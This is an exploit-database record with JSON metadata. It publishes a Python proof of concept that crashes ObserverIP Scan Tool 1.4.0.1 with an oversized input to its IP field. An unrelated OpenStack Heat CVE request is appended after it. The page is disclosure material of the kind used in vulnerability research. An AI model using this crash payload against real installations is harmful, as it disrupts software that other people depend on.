ObserverIP Scan Tool 1.4.0.1 - Denial of Service Exploit
2018-08-16T00:00:00
ID 1337DAY-ID-30891 Type zdt Reporter Gionathan Reale Modified 2018-08-16T00:00:00
Description
Exploit for windows platform in category dos / poc
# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Homepage: https://www.ambientweather.com
# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe
# Tested Version: 1.4.0.1
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Now click "Okay" and in the new window paste the content of
# "exploit.txt" into the following fields:"IP". Click "Search" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# 0day.today [2018-08-16] #
{"id": "1337DAY-ID-30891", "bulletinFamily": "exploit", "title": "ObserverIP Scan Tool 1.4.0.1 - Denial of Service Exploit", "description": "Exploit for windows platform in category dos / poc", "published": "2018-08-16T00:00:00", "modified": "2018-08-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/30891", "reporter": "Gionathan Reale", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-08-16T16:26:43", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "5416e042ce2df71a8fe84799809f2470"}, {"key": "modified", "hash": "c4feaec739b03bb720671fafb8c0c5bd"}, {"key": "published", "hash": "c4feaec739b03bb720671fafb8c0c5bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f2092e958cfffc2bffb678df9a485aaf"}, {"key": "sourceData", "hash": "28ca543ce12ec1a9a45ef1aa8ac11c54"}, {"key": "sourceHref", "hash": "35d42460a2e5359ab6b1285dcb6c1c0b"}, {"key": "title", "hash": "ee92d0d872bc6ab9955e15001b58d77c"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "60d49276c514f002a14ea94c658d2371c5eee442d112fe1e7b84f99a8f61ffba", "viewCount": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-16T16:26:43"}, "dependencies": {"references": [], "modified": "2018-08-16T16:26:43"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/30891", "sourceData": "# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC) \r\n# Author: Gionathan \"John\" Reale\r\n# Homepage: https://www.ambientweather.com\r\n# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe\r\n# Tested Version: 1.4.0.1\r\n# Tested on OS: Windows 10\r\n \r\n# Steps to Reproduce: Run the python exploit script, it will create a new \r\n# file with the name \"exploit.txt\" just copy the text inside \"exploit.txt\"\r\n# and start the program. Now click \"Okay\" and in the new window paste the content of \r\n# \"exploit.txt\" into the following fields:\"IP\". Click \"Search\" and you will see a crash.\r\n \r\n#!/usr/bin/python\r\n \r\nbuffer = \"A\" * 2000\r\n \r\npayload = buffer\r\ntry:\r\n f=open(\"exploit.txt\",\"w\")\r\n print \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n f.write(payload)\r\n f.close()\r\n print \"[+] File created!\"\r\nexcept:\r\n print \"File cannot be created\"\n\n# 0day.today [2018-08-16] #"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nA vulnerability was discovered in OpenStack (see below). In order to\r\nensure full traceability, we need a CVE number assigned that we can\r\nattach to further notifications. This issue is already public, although\r\nan advisory was not sent yet.\r\n\r\nTitle: Heat template URL information leakage\r\nReporter: Jason Dunsmore (Rackspace)\r\nProducts: Heat\r\nVersions: 2013.2 to 2013.2.3, and 2014.1\r\n\r\nDescription:\r\nJason Dunsmore from Rackspace reported a vulnerability in Heat. An\r\nauthenticated user may temporarily see the URL of a provider template\r\nused in another tenant by listing heat resources types. This may result\r\nin disclosure of additional information if the template itself can be\r\naccessed. The URL disappears from the listing after a certain point in\r\nthe stack creation. All Heat setups are affected.\r\n\r\nReferences:\r\nhttps://launchpad.net/bugs/1311223\r\n\r\nThanks in advance,\r\n\r\n-- Tristan Cacqueray OpenStack Vulnerability Management Team\r\n\r\n", "modified": "2014-06-19T00:00:00", "published": "2014-06-19T00:00:00", "id": "SECURITYVULNS:DOC:30891", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30891", "title": "[oss-security] CVE request for vulnerability in OpenStack Heat", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
